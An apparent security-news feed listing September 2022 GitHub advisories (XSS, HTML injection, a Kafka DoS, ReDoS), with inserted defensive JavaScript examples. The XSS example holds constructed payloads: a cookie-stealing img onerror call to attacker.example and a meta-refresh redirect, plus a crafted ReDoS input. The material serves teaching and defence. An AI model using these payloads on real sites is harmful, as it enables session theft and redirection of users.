トピトピニュース

MODERATE

505 Posts

Featured (posted by GitHub)

  • [org.keycloak:keycloak-core] Stored Cross-Site Scripting (XSS) in Keycloak via groups dropdown
  • [baserproject/basercms] baserproject/basercms vulnerable to cross-site scripting (XSS)
  • [org.postgresql:postgresql] TemporaryFolder on unix-like systems does not limit access to created files
  • [com.h2database:h2] Password exposure in H2 Database

[yetiforce/yetiforce-crm] YetiForce CRM vulnerable to stored Cross-site Scripting via SlaPolicy module

  • Posted in MODERATE
  • Posted by GitHub
  • 09/21/2022 (updated 09/22/2022)

YetiForce CRM versions 6.4.0 and prior are vulnerable to stored cross-site scripting via the SlaPolicy module. A patch is available at commit e55886781509fe39951fc7528347696474a17884.
References

https://nvd.nist.gov/vuln/detail/CVE-2022-3005
https://github.c…

[yetiforce/yetiforce-crm] YetiForce CRM vulnerable to stored Cross-site Scripting via WidgetsManagement module

  • Posted in MODERATE
  • Posted by GitHub
  • 09/21/2022 (updated 09/22/2022)

YetiForce CRM versions 6.4.0 and prior are vulnerable to stored cross-site scripting via the WidgetsManagement module. A patch is available at commit b716ecea340783b842498425faa029800bd30420.
References

https://nvd.nist.gov/vuln/detail/CVE-2022-2924
https://…

[yetiforce/yetiforce-crm] YetiForce CRM vulnerable to stored Cross-site Scripting via WorkFlow module

  • Posted in MODERATE
  • Posted by GitHub
  • 09/21/2022 (updated 09/22/2022)

YetiForce CRM versions 6.4.0 and prior are vulnerable to stored cross-site scripting via the WorkFlow module. A patch is available at commit cd82ecce44d83f1f6c10c7766bf36f3026de024a.
References

https://nvd.nist.gov/vuln/detail/CVE-2022-3004
https://github.co…

[microweber/microweber] Microweber Cross-site Scripting can result in redirection to a malicious site

  • Posted in MODERATE
  • Posted by GitHub
  • 09/21/2022 (updated 09/22/2022)

Microweber versions 1.3.1 and prior are vulnerable to HTML injection that an attacker can use to redirect a victim to a malicious site. A patch is available at commit 68f0721571653db865a5fa01c7986642c82e919c and is expected to ship in version 1.3.2.
Ref…

[org.apache.kafka:kafka] Apache Kafka vulnerability can lead to brokers hitting OutOfMemoryException, causing Denial of Service

  • Posted in MODERATE
  • Posted by GitHub
  • 09/21/2022 (updated 09/22/2022)

A security vulnerability has been identified in Apache Kafka. It affects all releases since 2.8.0. The vulnerability allows malicious, unauthenticated clients to make brokers allocate large amounts of memory before any authentication has taken place. This can lead to brokers hitting OutOfMemoryEx…
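The allocation problem described above, as an added example in JavaScript; this is not Apache Kafka's code or configuration. A broker-style server reads length-prefixed frames (a 4-byte big-endian size followed by the payload). The unsafe reader trusts the size field, so four hostile bytes commit the server to a huge allocation before any payload arrives; the hardened reader checks the size against a limit chosen from the connection's state, with a much smaller limit for connections that have not authenticated yet. The two limits, the function names and the hostile header are assumptions constructed for illustration.

```javascript
// Added example, not Apache Kafka's code: length-prefixed frame reader that
// validates the claimed size against a state-dependent limit before allocating.
const MAX_FRAME_AUTHENTICATED = 100 * 1024 * 1024; // assumed: 100 MiB for real requests
const MAX_FRAME_UNAUTHENTICATED = 512 * 1024;      // assumed: 512 KiB is ample for a handshake

// Vulnerable: the size field is trusted, so a 4-byte header can force a
// multi-gigabyte allocation before a single payload byte has been received.
// Shown for contrast only; it is never called below.
function readFrameUnsafe(header) {
  const size = header.readUInt32BE(0);
  return Buffer.alloc(size); // may throw RangeError or exhaust memory
}

// Hardened: pick the limit from connection state and reject before allocating.
// A rejected frame should close the connection rather than buffer anything.
function readFrameSafe(header, { authenticated }) {
  if (header.length < 4) throw new Error("short header");
  const size = header.readUInt32BE(0);
  const limit = authenticated ? MAX_FRAME_AUTHENTICATED : MAX_FRAME_UNAUTHENTICATED;
  if (size > limit) {
    return { accepted: false, size, limit };
  }
  return { accepted: true, size, buffer: Buffer.alloc(size) };
}

// Constructed hostile header: claims a 2 GiB frame with no payload behind it.
function hostileHeader(claimedSize = 2 ** 31) {
  const h = Buffer.alloc(4);
  h.writeUInt32BE(claimedSize, 0);
  return h;
}

// Same hostile header on an unauthenticated and an authenticated connection,
// plus a legitimately small frame that is accepted.
function demo() {
  const preAuth = readFrameSafe(hostileHeader(), { authenticated: false });
  const postAuth = readFrameSafe(hostileHeader(), { authenticated: true });
  const small = readFrameSafe(hostileHeader(1024), { authenticated: true });
  return { preAuth, postAuth, small };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

The point of the two limits is that a request cap sized for real traffic (here 100 MiB) is still far too generous for a client that has not proven who it is; the pre-authentication budget should only be large enough to carry a handshake, and any frame exceeding it is grounds to drop the connection.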

[yetiforce/yetiforce-crm] YetiForce CRM vulnerable to stored Cross-site Scripting via LayoutEditor module

  • Posted in MODERATE
  • Posted by GitHub
  • 09/21/2022 (updated 10/01/2022)

YetiForce CRM versions 6.4.0 and prior are vulnerable to stored cross-site scripting via the LayoutEditor module. A patch is available at commit eebc12601495ada38495076bec12841b2477516b.
References

https://nvd.nist.gov/vuln/detail/CVE-2022-3000
https://githu…

[microweber/microweber] Microweber vulnerable to HTML Injection in create tag functionality

  • Posted in MODERATE
  • Posted by GitHub
  • 09/21/2022 (updated 09/24/2022)

An HTML injection attack is closely related to cross-site scripting (XSS). HTML injection uses attacker-supplied markup to alter or deface the page (a redirect via an injected tag needs no script at all). XSS goes one step further and injects script that runs in the victim's browser. Both stem from the same root cause: user input written into the page without validation or output encoding. A patch is avai…

[github.com/HFO4/cloudreve] Cross site scripting in Cloudreve

  • Posted in MODERATE
  • Posted by GitHub
  • 09/21/2022 (updated 09/24/2022)

Cloudreve versions v1.0.0 through v3.5.3 are vulnerable to stored cross-site scripting (XSS) via the file upload functionality. A low-privileged user can share a file with an admin user; the stored payload then runs in the admin's session when the shared file is viewed, which could lead to privilege escalation.
References…
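The HTML injection versus XSS distinction drawn in the Microweber post above, together with the redirection outcome described for Microweber and the share-with-admin stored XSS described for Cloudreve, as an added example in JavaScript. This is not code from Microweber, Cloudreve or YetiForce: the template, the `escapeHtml`, `renderTagUnsafe`, `renderTagSafe` and `containsInjectedTag` functions and both payload strings are constructed for illustration. Both payloads reach the page through the same unescaped template; one is pure HTML injection that redirects the viewer, the other is script that runs in whoever views it, which is an admin in the sharing case.

```javascript
// Added example, not code from any of the advisories' projects: the same
// unescaped template carries an HTML-injection redirect and a stored XSS payload;
// output encoding for the HTML context fixes both.

// Escape the five characters that can change HTML text or quoted-attribute context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: a user-controlled name (a tag, a file name) is concatenated into markup.
function renderTagUnsafe(name) {
  return `<span class="tag">${name}</span>`;
}

// Hardened: the untrusted value is escaped for the HTML text context it lands in.
function renderTagSafe(name) {
  return `<span class="tag">${escapeHtml(name)}</span>`;
}

// Constructed payload 1: HTML injection with no JavaScript at all. The injected
// meta refresh sends every viewer of the page to the attacker's site.
const htmlInjectionPayload =
  '</span><meta http-equiv="refresh" content="0;url=https://attacker.example/">';

// Constructed payload 2: stored XSS. The script runs in the session of whoever
// views the stored value, e.g. an admin reviewing a file shared with them.
const xssPayload =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// A check usable in a unit test or code review: rendered output may contain no
// tag other than the one the template itself emits.
function containsInjectedTag(html, allowedTag) {
  const tags = html.match(/<\/?([a-zA-Z][a-zA-Z0-9]*)/g) || [];
  return tags.some((t) => t.replace(/^<\/?/, "").toLowerCase() !== allowedTag);
}

// Run both payloads through both renderers and report which outputs are tainted.
function compareRenderers() {
  const result = {};
  for (const [label, payload] of [["htmlInjection", htmlInjectionPayload], ["xss", xssPayload]]) {
    result[label] = {
      unsafeTainted: containsInjectedTag(renderTagUnsafe(payload), "span"),
      safeTainted: containsInjectedTag(renderTagSafe(payload), "span"),
    };
  }
  return result;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(compareRenderers());
}
```

Escaping is context-specific: `escapeHtml` is correct for HTML text and for quoted attribute values, but a value placed into a URL, a `<script>` block or an event-handler attribute needs that context's encoding instead. A Content Security Policy that blocks inline script would stop the second payload as defence in depth but not the first, which contains no script, so output encoding remains the primary fix.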

[steal] steal Inefficient Regular Expression Complexity vulnerability via string variable

  • Posted in MODERATE
  • Posted by GitHub
  • 09/21/2022 (updated 09/24/2022)

A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs/steal 2.2.4 via the string variable in babel.js: a crafted string makes the regular expression backtrack excessively and ties up the process.
References

https://nvd.nist.gov/vuln/detail/CVE-2022-37259
https://github.com/stealjs/steal/issues/1528
https://github.com/stealj…
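The backtracking behind a ReDoS, as an added example in JavaScript that is not steal's code: the patterns and inputs below are constructed and are not the expression from steal's babel.js. A nested quantifier over the same character class forces the engine to try every way of splitting the run between the two loops when the match fails, so work grows exponentially with input length. The example times the vulnerable pattern against an equivalent single-loop rewrite and shows an input-length guard; `MAX_LEN` and the function names are assumptions for illustration.

```javascript
// Added example, not steal's code: catastrophic backtracking in a nested
// quantifier, the linear rewrite, and a length guard applied before matching.

// Nested quantifier: on a failing input the engine tries every partition of the
// run of 'a's between the inner and outer '+', roughly 2^n attempts.
const vulnerableRe = /^(a+)+$/;
// Same language, one loop, no ambiguity: linear in the input length.
const safeRe = /^a+$/;

// Constructed attacker input: a run that almost matches, then a character that
// forces failure and a full backtrack.
function evilInput(n) {
  return "a".repeat(n) + "!";
}

// Time a single test; `performance` is a Node global (v16+).
function timedTest(re, input) {
  const t0 = performance.now();
  const matched = re.test(input);
  return { matched, ms: performance.now() - t0 };
}

// Defence usable when a pattern cannot be rewritten: refuse oversized input before
// the regex sees it. A cap bounds polynomial blow-ups and limits damage; for an
// exponential pattern like vulnerableRe it is not sufficient on its own, because
// 30 characters already cost ~2^30 steps, so the rewrite is the real fix.
const MAX_LEN = 1000; // assumed, application-specific limit
function guardedTest(re, input, maxLen = MAX_LEN) {
  if (typeof input !== "string" || input.length > maxLen) {
    return { matched: false, rejected: true };
  }
  return { matched: re.test(input), rejected: false };
}

// Both patterns agree on the answer; only the cost differs.
function compare(n) {
  const v = timedTest(vulnerableRe, evilInput(n));
  const s = timedTest(safeRe, evilInput(n));
  return { n, vulnerableMs: v.ms, safeMs: s.ms, sameResult: v.matched === s.matched };
}

if (typeof require !== "undefined" && require.main === module) {
  for (const n of [10, 16, 22]) console.log(compare(n));
}
```

Doubling n from 16 to 22 multiplies the vulnerable pattern's time by roughly 64 while the rewrite stays flat, which is the signature to look for when triaging a reported ReDoS: a failing input whose cost grows much faster than its length.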

[github.com/drakkan/sftpgo] SFTPGo WebClient vulnerable to Cross-site Scripting

  • Posted in MODERATE
  • Posted by GitHub
  • 09/21/2022 (updated 09/24/2022)

Impact
Cross-site scripting (XSS) vulnerabilities have been reported in the SFTPGo WebClient. If exploited, they allow remote attackers to inject malicious script into pages served by the WebClient.
Patches
Fixed in v2.3.5.
References

https://github.com/drakkan/sftpgo/s…
